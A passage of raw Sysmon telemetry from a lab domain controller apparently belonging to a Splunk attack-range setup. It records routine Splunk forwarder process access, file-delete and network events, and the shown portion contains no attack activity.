(rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x800000000000000098407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.042{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:53.760{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=267A9D9E82710AF43C352A951C1E7332,SHA256=06ECD2169AC8A60B2636C7A7CBBC9E84A8A6F49700D53583EA3EE4249EC4F947,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:54.853{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59CE68AAA05274115B0AC1901874AC59,SHA256=21FCB6B0D428911374FF5F1CC6C128DDD052033A5EF511B8DB9C12D5C3B3D316,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.969{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53307-false10.0.1.12-8000- 23542300x800000000000000098495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:55.947{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B4B2E540B0AD09937C7C76AE4B02E6,SHA256=9FA5DE90EDBF5362CBEEC3D8BDBAA5E29FE89E40DED987F5006F941B9E73ACE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:57.041{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDB050D6EB305D8D78BCCDF3D8321B41,SHA256=758BA7FA3A4F8FA8B252627EA30266065B0431096BA56C899729DD8C8F35B96C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:58.150{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911452481ACBC265F42B3A0F33B59410,SHA256=9F9B88C1297A66212BCD7575BA1C5E3B72BB561A64046E9E40867FAA247C6DAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:59.244{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AECCA98368B6F8A46F21A33700A538,SHA256=ECA5396C71B64CA987C75F29666731FDF216547C19CF11893B13290F083B3F3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:00.338{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1E3776573736D15267F148AC71499A2,SHA256=BD1268437EE86E9EC819514E8B04DAC3E236462593D6AAE14729AD84C100BB0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:55.999{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53308-false10.0.1.12-8000- 23542300x800000000000000098501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:01.432{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B5C79E4F0667CFF84FA520EB244328,SHA256=7AB886F8E2E90F1DB593289E8583AA05DBD937BA853D66ECB6372F0A39972BC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:02.525{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4503447AF5E92D8B333E000E235EA04,SHA256=7DD38058520C78D315D19BDBEB56AA9C72B234923D2126CF508198D3CAF926EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:03.619{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=818460CC2B2B4DD6112CB520D7C27D68,SHA256=B0B761BB0769B4AF51C91C91C0A43A2F3E463EE0F32887F2B043FEE67D41F60C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:04.713{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B7EF3037B895DBC96E9BB6D2326555,SHA256=BE0F8172093113BC8ECABE5F154B786CFD24935A4F05C874C739720E98DEBEFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:05.807{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1520945D70C6047AFC2A878ADBE3250,SHA256=EE34DAC434BA64B1F8A3D1B6AABAE42B6A3E7DE71BBF058886B40406AEA8C123,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:06.900{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27696179A1A2544BC62086FCCD6538FE,SHA256=D1F6D136C4C4ED7DBD4CB2BE0DED91F7B3C772F19544A895E8AA613D855B4166,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:02.015{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53309-false10.0.1.12-8000- 23542300x800000000000000098508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:07.994{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A287E5BD7AFE90CEB6B3C18F07B6B638,SHA256=C60F51DED32A015422A0AD4C0753F2C585FDE1D4EC52B0C02FD55B80DDBF5399,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:09.088{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A63316876553BDEEAEA436D6DA5CCD,SHA256=3D342F1045FF151AB3A9DB8F31431FEDC3A6A1B620BAA61A6915631A9BBD3C7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:10.181{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CC3E1B2848812D01EBDF677ECFFB6C3,SHA256=FE49153DAC8A2FE681D3228AAD07D6A3AE5ACCBE89BFCDF02F3135C0951B8C28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:07.968{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53310-false10.0.1.12-8000- 23542300x800000000000000098511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:11.275{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75907C31B1EDFBB8CE079D1B21C03F2B,SHA256=B7CA18B531067BE051FC64C099078B9C37B024348BAA0B1B4C836501DD406D6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:12.369{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F761E9C99FCB3EECA99A3EF33AB66A4,SHA256=77D7C27F09679AAE44FF6FBFCD982F1190B1AA7A904B142F50AC541703A83085,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:13.463{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=540329D0E3B7C0B0EED98EAFCC3D9499,SHA256=C4FAF66EE93556EB46309BAC8678BD3E53EE0DB39B6904AA68B2E34E8E04D12F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:14.556{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F47EFE6E93AF2DC1968B4D371ACFD29,SHA256=2F08210459995FBB792CD107F6A3BA3D6A5B73C0B305BEEC8516430C643458BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:15.650{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D5188197D9F057913AB6B7835C6099F,SHA256=DBC7A2B15FF34567586417E92FFE510BF6F769E43273B80B49E82BA75350BDCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:16.744{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F833C4F75AEE16DE27703B847C9C93A,SHA256=A141E882EF661C90446AC32A98DFF50683EA258ECEAF30C712BECBE13F7101A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:13.078{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53311-false10.0.1.12-8000- 23542300x800000000000000098519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:17.838{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FCFCECBCA616CE5B87CDC0AD18D184,SHA256=97CFA1D08519310453315189F0E41066D6496A962B679300C86FEA4E87704389,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.931{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4C46E834455A984ADCBF7B0AB6027FB,SHA256=2DFDFD2ED22303222753CF3A2716CBE487AF17A4EE648A29125EFE5CA198A1AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.353{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2DDB2F76134BB4CCACA34D03A0FD7B93,SHA256=881F8670E05A51CE1019CB7B36D1BB2CF0565B6AF6ADF723ACFE2C6ADA3ABAEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:19.072{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=789378AE5D6DBC9DDBDC4E278D612DC3,SHA256=CE99020FED46A779F35AF7E535DD435A6CFB1D68279082587E3BA07728D61CF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:20.025{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C43FE991F940A320E9470AA57F59EFF4,SHA256=42AB88F9C9E51E4DB70121583AEE665B812F593E00D33AF7664AE1A21B4E7E15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.093{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53312-false10.0.1.12-8000- 23542300x800000000000000098524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:21.119{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38096C21D4B961AF90ED79A2FCBFB195,SHA256=875DE63D16F269ED2586B07B21DA908EDEA5F777436C03936C6AF1266084BC70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:22.213{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB9232CCA27D099C119FE2A08D60596E,SHA256=04C091959DF545819A0C6BC150A5FA3CE1DBC2CD77DB6D9B60119518D1D4CDFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:23.634{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 